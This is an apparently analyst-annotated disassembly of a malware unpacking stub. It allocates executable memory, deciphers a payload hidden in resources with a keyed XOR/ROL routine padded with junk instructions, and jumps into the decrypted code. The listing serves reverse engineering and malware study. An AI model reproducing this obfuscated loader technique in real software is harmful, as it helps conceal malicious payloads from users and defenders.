.text:0040C0B3 .text:0040C0B3 loc_40C0B3: ; CODE XREF: .text:00404A19 .text:0040C0B3 ; DATA XREF: .text:0040C4F2 .text:0040C0B3 xor ecx, ecx .text:0040C0B5 xor ecx, 3C572FD1h ; ECX=0x3C572FD1 which is the deciphering key .text:0040C0BB xor edi, edi .text:0040C0BD sub edi, 674h .text:0040C0C3 neg edi ; EDI will be a counter of bytes to copy and decipher .text:0040C0C5 push ecx ; Stacking the deciphering key .text:0040C0C6 mov ebx, 28601AAh .text:0040C0CB sub ebx, 286016Ah .text:0040C0D1 push ebx ; Stacking 0x40 (0x28601AA-0x286016A), ie PAGE_EXECUTE_READWRITE .text:0040C0D2 mov ebx, 286116Ah .text:0040C0D7 sub ebx, 286016Ah .text:0040C0DD push ebx ; Stacking 0x1000 (0x286116A-0x286016A), ie MEM_COMMIT .text:0040C0DE mov esi, 28607DEh .text:0040C0E3 sub esi, 286016Ah .text:0040C0E9 push esi ; Stacking 0x674 .text:0040C0EA mov eax, 0 .text:0040C0EF push eax .text:0040C0F0 call ds:VirtualAlloc ; EAX = VirtualAlloc ( NULL, 0x674, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); .text:0040C0F6 pop ecx ; Unstacking the deciphering key .text:0040C0F7 cmp eax, 0 .text:0040C0FA jz loc_4033C4 ; if VirtualAlloc failed, terminate ! .text:0040C100 sub esi, esi .text:0040C102 add esi, 4BB267h ; 0x4BB267 refers ciphered code and payload hidden in resources .text:0040C108 sub edx, edx .text:0040C10A or edx, eax .text:0040C10C push edx ; Stacking new memory block address .text:0040C10D .text:0040C10D loc_40C10D: ; CODE XREF: .text:0040C4A6j .text:0040C10D sub eax, 0FFFFFFDDh .text:0040C110 adc byte ptr dword_40F032+2, al .text:0040C116 mov byte ptr dword_40F0D6+3, 10h .text:0040C11D mov ah, byte ptr dword_40F1AF+3 .text:0040C123 mov eax, dword_40F050+1 .text:0040C128 adc eax, eax .text:0040C12A xor eax, eax .text:0040C12C or dword_40F16B+1, eax .text:0040C132 mov ah, byte ptr dword_40F0B1+1 .text:0040C138 mov byte ptr dword_40F1D1, 27h .text:0040C13F and dword_40F12B+1, eax .text:0040C145 add eax, 46h .text:0040C148 mov byte ptr dword_40F058+2, 0FAh .text:0040C14F mov eax, dword ptr unk_40F1CF .text:0040C154 adc eax, 26h .text:0040C157 mov ebx, [esi] ; Loading 4 ciphered bytes from the resources .text:0040C159 xor al, ah .text:0040C15B mov al, byte ptr unk_40F117 .text:0040C160 mov eax, dword_40F0C8+1 .text:0040C165 sbb eax, eax .text:0040C167 mov byte ptr dword_40F032, 77h .text:0040C16E sbb dword_40F085, eax .text:0040C174 sub dword_40F19B+2, eax .text:0040C17A mov dword_40F14E+1, eax .text:0040C17F sbb dword ptr byte_40F1C1, eax .text:0040C185 adc eax, eax .text:0040C187 add eax, eax .text:0040C189 sub eax, eax .text:0040C18B sbb dword_40F010+1, eax .text:0040C191 or eax, 0FFFFFFD7h .text:0040C194 sub eax, eax .text:0040C196 clc .text:0040C197 adc esi, 4 ; Moving forward of 4 bytes in source .text:0040C19A adc ah, 42h .text:0040C19D mov eax, dword_40F15D .text:0040C1A2 add eax, 0FFFFFFEFh .text:0040C1A5 add eax, eax .text:0040C1A7 sub dword_40F1DD+2, eax .text:0040C1AD mov eax, dword_40F0CF+3 .text:0040C1B2 xor eax, eax .text:0040C1B4 mov eax, dword_40F1E5+1 .text:0040C1B9 mov al, byte ptr unk_40F025 .text:0040C1BE add al, 0B0h .text:0040C1C0 xor dword ptr unk_40F0D4, eax .text:0040C1C6 mov eax, dword_40F076+3 .text:0040C1CB mov byte ptr dword_40F15D, 0A7h .text:0040C1D2 xor eax, 0FFFFFFD8h .text:0040C1D5 add eax, eax .text:0040C1D7 not ebx ; not EBX .text:0040C1D9 mov byte_40F080, 30h .text:0040C1E0 mov byte ptr dword_40F0DB+2, 36h .text:0040C1E7 mov dword_40F01D, eax .text:0040C1EC and eax, 2Eh .text:0040C1EF and eax, 9 .text:0040C1F2 mov byte ptr dword_40F12B+3, 60h .text:0040C1F9 add eax, 0Ch .text:0040C1FC mov byte ptr dword_40F081+1, 40h .text:0040C203 sbb eax, eax .text:0040C205 mov byte_40F05E, 0Fh .text:0040C20C xor eax, eax .text:0040C20E xor eax, eax .text:0040C210 mov al, byte ptr dword_40F1C7+3 .text:0040C215 or eax, 0FFFFFFA1h .text:0040C218 adc dword ptr unk_40F101, eax .text:0040C21E sub ebx, 19h ; SUB EBX,19h .text:0040C221 sub eax, 3Dh .text:0040C224 xor eax, eax .text:0040C226 mov byte ptr dword_40F04C+2, 0BCh .text:0040C22D mov al, byte ptr dword_40F1DD+2 .text:0040C232 add dword_40F0A1+3, eax .text:0040C238 mov byte ptr dword_40F1D5+3, 93h .text:0040C23F add eax, 3Eh .text:0040C242 sbb eax, 0FFFFFFD4h .text:0040C245 xor byte ptr dword_40F0CF+1, ah .text:0040C24B sbb eax, eax .text:0040C24D sbb eax, 7Fh .text:0040C250 add eax, 0FFFFFF8Ah .text:0040C253 mov byte_40F132, 0E9h .text:0040C25A mov byte ptr dword_40F167+2, 0Ch .text:0040C261 sbb al, 57h .text:0040C263 xor ebx, ecx ; XOR EBX,ECX .text:0040C265 mov byte ptr unk_40F037, 0Ah .text:0040C26C xor dword_40F000, eax .text:0040C272 mov byte ptr dword_40F08E+3, 77h .text:0040C279 sbb dword_40F00C+2, eax .text:0040C27F add eax, eax .text:0040C281 or dword_40F050+3, eax .text:0040C287 add eax, eax .text:0040C289 mov eax, dword ptr byte_40F018 .text:0040C28E add eax, eax .text:0040C290 adc eax, 0FFFFFF89h .text:0040C293 mov byte ptr dword_40F043+2, 4 .text:0040C29A add dword_40F15D+2, eax .text:0040C2A0 add eax, 0FFFFFFD8h .text:0040C2A3 add eax, 0FFFFFFBCh .text:0040C2A6 xor eax, 4Ah .text:0040C2A9 inc ebx ; INC EBX .text:0040C2AA or eax, 42h .text:0040C2AD sub dword_40F008, eax .text:0040C2B3 mov eax, dword_40F058 .text:0040C2B8 add eax, 0FFFFFFD6h .text:0040C2BB xor eax, 19h .text:0040C2BE add eax, 0FFFFFFB3h .text:0040C2C1 adc ah, al .text:0040C2C3 add eax, 0Dh .text:0040C2C6 sub eax, 0FFFFFFA1h .text:0040C2C9 add eax, eax .text:0040C2CB adc eax, 0FFFFFFD0h .text:0040C2CE add dword_40F14E+1, eax .text:0040C2D4 mov eax, dword_40F138 .text:0040C2D9 add eax, eax .text:0040C2DB sbb eax, 0FFFFFFDAh .text:0040C2DE mov ecx, ebx ; MOV ECX,EBX .text:0040C2E0 add dword_40F1E5+3, eax .text:0040C2E6 mov eax, dword_40F113+2 .text:0040C2EB mov eax, dword_40F14E .text:0040C2F0 mov eax, dword ptr byte_40F1C2 .text:0040C2F5 and eax, 0FFFFFF98h .text:0040C2F8 adc byte ptr dword_40F054+2, ah .text:0040C2FE mov byte ptr dword_40F065+3, 2Bh .text:0040C305 add eax, eax .text:0040C307 mov eax, dword ptr byte_40F103 .text:0040C30C add eax, 0FFFFFF92h .text:0040C30F mov byte ptr dword_40F054+3, 8Ah .text:0040C316 mov eax, dword_40F054 .text:0040C31B mov dword_40F1EA, eax .text:0040C320 mov byte ptr dword_40F060+2, 7Eh .text:0040C327 sbb eax, eax .text:0040C329 rol ecx, 1 ; ROL ECX,1 .text:0040C32B or dword_40F060+3, eax .text:0040C331 and dword_40F1A6, eax .text:0040C337 xor eax, eax .text:0040C339 adc eax, eax .text:0040C33B adc dword_40F08E, eax .text:0040C341 mov byte ptr dword_40F17E+1, 4Ch .text:0040C348 add eax, eax .text:0040C34A sub eax, eax .text:0040C34C sub eax, eax .text:0040C34E mov eax, dword_40F076+2 .text:0040C353 mov eax, dword_40F071+2 .text:0040C358 add al, 4Dh .text:0040C35A and dword_40F048+1, eax .text:0040C360 sub eax, eax .text:0040C362 add eax, eax .text:0040C364 rol ecx, 7 ; ROL ECX,7 .text:0040C367 add dword_40F03D+1, eax .text:0040C36D and eax, 1Fh .text:0040C370 mov byte ptr dword_40F026+3, 0B6h .text:0040C377 and eax, 0FFFFFFDAh .text:0040C37A mov eax, dword ptr unk_40F099 .text:0040C37F adc eax, eax .text:0040C381 mov al, byte_40F05E .text:0040C386 sbb eax, 53h .text:0040C389 mov byte ptr dword_40F0EE+1, 0F6h .text:0040C390 mov ah, byte ptr dword_40F161+2 .text:0040C396 add eax, 65h .text:0040C399 xor eax, eax .text:0040C39B mov byte ptr dword_40F186, 0Ch .text:0040C3A2 xor dword_40F1F2+1, eax .text:0040C3A8 adc eax, 0FFFFFF85h .text:0040C3AB mov [edx], ebx ; Store the 4 deciphered bytes .text:0040C3AD sbb eax, 0FFFFFFB0h .text:0040C3B0 and dword_40F16B+1, eax .text:0040C3B6 mov byte ptr dword_40F1F2+1, 3 .text:0040C3BD mov byte ptr dword_40F16B+2, 2Bh .text:0040C3C4 sub eax, 0FFFFFFA4h .text:0040C3C7 mov byte_40F09B, 0EFh .text:0040C3CE xor eax, 7Bh .text:0040C3D1 adc eax, 0FFFFFFCEh .text:0040C3D4 adc dword_40F06D+3, eax .text:0040C3DA xor dword_40F172+3, eax .text:0040C3E0 mov byte ptr dword_40F15D+2, 59h .text:0040C3E7 xor dword_40F0DB+3, eax .text:0040C3ED sbb dword_40F1D1+2, eax .text:0040C3F3 or dword_40F11C+2, eax .text:0040C3F9 mov byte ptr dword_40F07A+2, 0E8h .text:0040C400 lea edx, [edx+4] ; Moving forward of 4 bytes in destination .text:0040C403 adc dword_40F105+2, eax .text:0040C409 xor eax, 10h .text:0040C40C mov byte ptr dword_40F0E7, 0A2h .text:0040C413 mov byte ptr dword_40F09C+1, 6Ch .text:0040C41A mov eax, dword_40F014+2 .text:0040C41F mov eax, dword_40F1EE+3 .text:0040C424 add al, ah .text:0040C426 mov byte ptr unk_40F101, 79h .text:0040C42D add eax, eax .text:0040C42F xor byte ptr unk_40F19F, ah .text:0040C435 and dword_40F113+3, eax .text:0040C43B add dword ptr byte_40F1C3, eax .text:0040C441 mov eax, dword_40F1B7 .text:0040C446 mov byte ptr dword_40F043+1, 5Bh .text:0040C44D mov byte ptr dword_40F0DB+3, 0E9h .text:0040C454 lea edi, [edi-4] ; There are 4 bytes less to decipher .text:0040C457 xor eax, 0FFFFFFCBh .text:0040C45A add eax, eax .text:0040C45C mov byte ptr dword_40F17E+1, 4Eh .text:0040C463 mov eax, dword_40F04C .text:0040C468 mov eax, dword_40F089 .text:0040C46D mov al, byte ptr dword_40F02E+2 .text:0040C472 mov byte ptr unk_40F18F, 0D3h .text:0040C479 adc dword_40F01D+2, eax .text:0040C47F sub dword_40F01D+2, eax .text:0040C485 mov byte_40F196, 28h .text:0040C48C mov eax, dword_40F08E+1 .text:0040C491 mov byte_40F0ED, 33h .text:0040C498 adc eax, eax .text:0040C49A mov byte ptr dword_40F197+3, 0FEh .text:0040C4A1 sub eax, eax .text:0040C4A3 cmp edi, 0 ; copy and decipher finished ? .text:0040C4A6 jnz loc_40C10D ; No, next 4 bytes please... .text:0040C4AC mov edx, esp ; Getting address of memory block allocated above and pushed in 0x40C10C .text:0040C4AE mov esi, ds:GetModuleHandleA .text:0040C4B4 push esi ; Stacking address of GetModuleHandleA .text:0040C4B5 add dword_40F0C8+3, ebx .text:0040C4BB add esi, esi .text:0040C4BD sub dword ptr byte_40F03A, eax .text:0040C4C3 add edi, esi .text:0040C4C5 add dword_40F00C+1, ecx .text:0040C4CB and ebx, 0FFFFFFD9h .text:0040C4CE mov edi, dword_40F065 .text:0040C4D4 adc dword_40F076, ebx .text:0040C4DA add esi, 0FFFFFFD4h .text:0040C4DD add eax, ebx .text:0040C4DF mov esi, dword_40F0B8+1 .text:0040C4E5 xor ecx, esi .text:0040C4E7 xor ebx, 0FFFFFFA2h .text:0040C4EA mov esi, dword_40F1D1+2 .text:0040C4F0 xor esi, eax .text:0040C4F2 push offset loc_40C0B3 ; Stacking decipher routine for future use ? .text:0040C4F7 sub edi, ebx .text:0040C4F9 mov byte ptr unk_40F0B5, 96h .text:0040C500 adc edi, ebx .text:0040C502 mov byte ptr dword_40F158, 0BFh .text:0040C509 mov byte ptr dword_40F0E7+2, 0BAh .text:0040C510 mov ebx, dword_40F043 .text:0040C516 or dword_40F197+1, ecx .text:0040C51C mov byte ptr dword_40F167+2, 18h .text:0040C523 add ecx, eax .text:0040C525 sbb esi, 28h .text:0040C528 mov byte_40F1C6, 0EDh .text:0040C52F mov byte ptr dword_40F1DD+1, 5Fh .text:0040C536 xor eax, esi .text:0040C538 mov byte ptr dword_40F161, 47h .text:0040C53F mov byte ptr dword_40F0C4+3, 0ECh .text:0040C546 jmp dword ptr [edx] ; Going to execute deciphered code... .text:0040C546 ; ---------------------------------------------------------------------------